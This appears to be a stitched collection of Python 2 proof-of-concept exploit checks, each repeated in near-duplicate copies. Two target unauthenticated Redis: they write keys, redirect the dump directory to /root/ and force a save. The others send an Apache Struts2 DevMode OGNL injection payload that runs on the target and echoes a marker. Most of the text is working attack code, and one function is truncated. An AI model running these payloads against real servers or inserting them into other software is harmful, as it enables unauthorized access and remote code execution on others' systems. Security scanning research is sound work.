def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ':' + str(web_port))
except Exception:
real_url = ip + ':' + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if 'redis_version' not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set('dir', '/root/') # 判断对/var/www的写入权限(目前先判断为root)
r.config_set('dbfilename', 'dump.rdb') # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
url = host2IP(url)
ip = url.split(":")[0]
port = int(url.split(":")[-1]) if ":" in url else 6379
for web_port in [80, 443, 8080, 8443]: # 判断web服务
if checkPortTcp(ip, web_port):
try:
real_url = redirectURL(ip + ":" + str(web_port))
except Exception:
real_url = ip + ":" + str(web_port)
break # TODO 这里简单化处理,只返回了一个端口的结果
else:
return False
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
if "redis_version" not in r.info(): # 判断未授权访问
return False
key = randomString(5)
value = randomString(5)
r.set(key, value) # 判断可写
r.config_set("dir", "/root/") # 判断对/var/www的写入权限(目前先判断为root)
r.config_set("dbfilename", "dump.rdb") # 判断操作权限
r.delete(key)
r.save() # 判断可导出
except Exception, e:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
try:
url = redirectURL(url)
except Exception, e:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
url = redirectURL(url)
key = randomString()
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
target = (url + payload)
try:
c = requests.get(target, headers={'User-Agent': firefox()}, timeout=5).content
if key in c and 'xwork2.dispatcher' not in c:
return url
except Exception, e:
return False
def poc(url):
if '://' not in url:
url = 'http://' + url
if '?' in url:
url = url.split('?')[0]
if '.action' not in url:
url = redirectURL(url)
key = randomString()
payload = "?debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=" + key
target = (url + payload)
try:
c = requests.get(target, headers={
'User-Agent': firefox()
}, timeout=5).content
if key in c and 'xwork2.dispatcher' not in c:
return url
except Exception, e:
logging.debug(e)
